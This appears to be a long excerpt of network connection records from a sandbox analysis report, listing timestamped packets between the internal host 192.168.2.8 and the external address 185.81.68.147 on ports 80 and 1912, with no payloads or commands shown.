                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.644462109 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.650146008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.650181055 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.650209904 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.650510073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.650557995 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.650599957 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.651297092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.651364088 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.651417017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.652095079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.652153015 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.653408051 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.653498888 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.653580904 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.653789997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.653904915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.654731035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.654778957 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.654819965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.655468941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.655514002 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.655563116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.655599117 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.656311989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.656438112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.656480074 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.657145977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.657249928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.657291889 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.657970905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.658037901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.658793926 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.764221907 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.797393084 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.797431946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.797483921 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.797775984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.797914982 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.797976971 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.798526049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.798634052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.798691034 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.799324989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.799407005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.799468040 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.800211906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.800345898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.800415039 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.800983906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.801100016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.801269054 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.801917076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.801970959 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.802086115 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.802767992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.802846909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.802900076 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.803539038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.803601027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.803658962 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.804333925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.804436922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.804493904 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.805253029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.805318117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.805396080 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.806000948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.806129932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.806188107 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.806910992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.807022095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.807070017 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.807693958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.807857990 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.807914019 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.808747053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.808804035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.809261084 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.809335947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.809456110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.809513092 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.810165882 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.810328007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.810396910 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.811014891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.811207056 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.811263084 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.811856985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.811948061 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.812087059 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.812650919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.812773943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.812822104 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.813544989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.813764095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.814004898 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.814346075 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.814430952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.814518929 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.815344095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.815459967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.815505981 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.815989017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.816098928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.816207886 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.816862106 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.817071915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.817290068 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.817814112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.817935944 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.817991018 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.818491936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.818608999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.818722963 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.819643974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.819798946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.819849968 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.820216894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.820324898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.820370913 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.820986986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.821114063 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.821201086 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.821974039 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.822041035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.822092056 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.822658062 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.822803974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.823023081 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.823499918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.823626995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.823715925 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.824477911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.824593067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.824696064 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.825176001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.825274944 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.825326920 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.826021910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.826147079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.826195955 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.826814890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.826925993 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.826975107 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.827676058 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.827769041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.827816963 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.828512907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.828618050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.828669071 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.829355001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.829468012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.829823971 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.830182076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.830306053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.830449104 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.831036091 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.831121922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.831168890 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.831845045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.831967115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.832017899 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.832700014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.842818975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.842835903 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.842849016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.842875957 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.842889071 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.842924118 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.843769073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.843810081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.843874931 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.844418049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.844491005 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.847476959 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.847507954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.847528934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.847541094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.847556114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.847563028 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.847570896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.847580910 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.847623110 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.847966909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.848140955 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.848591089 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.848995924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.849170923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.849227905 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.849617958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.849630117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.849699974 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.850682974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.850696087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.850733995 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.989646912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.989743948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.989798069 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.989881039 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.990128040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.990181923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.990236044 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.990997076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.991060972 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.991094112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.991777897 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.991828918 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.991869926 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.992572069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.992664099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.992664099 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.993454933 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.993508101 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.993571043 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.994313955 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.994375944 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.994395018 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.995085955 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.995166063 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.995208979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.995920897 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.995980024 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.996032000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.996783972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.996835947 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.996892929 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.997659922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.997701883 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.997741938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.998403072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.998450994 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.998513937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.999248028 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.999295950 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.999362946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.000087023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.000133038 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.000201941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.000935078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.001029015 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.001039028 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.001754999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.001801014 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.001912117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.002579927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.002669096 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.002722979 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.003412962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.003459930 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.003523111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.004439116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.004467964 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.004513979 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.005091906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.005173922 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.005211115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.005987883 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.006041050 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.006216049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.007236958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.007278919 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.007412910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.008111000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.008166075 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.008218050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.008728027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.008773088 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.008810043 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.009596109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.009648085 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.009682894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.010349989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.010391951 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.010395050 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.010915995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:48.010962963 CET4970980192.168.2.8185.81.68.147
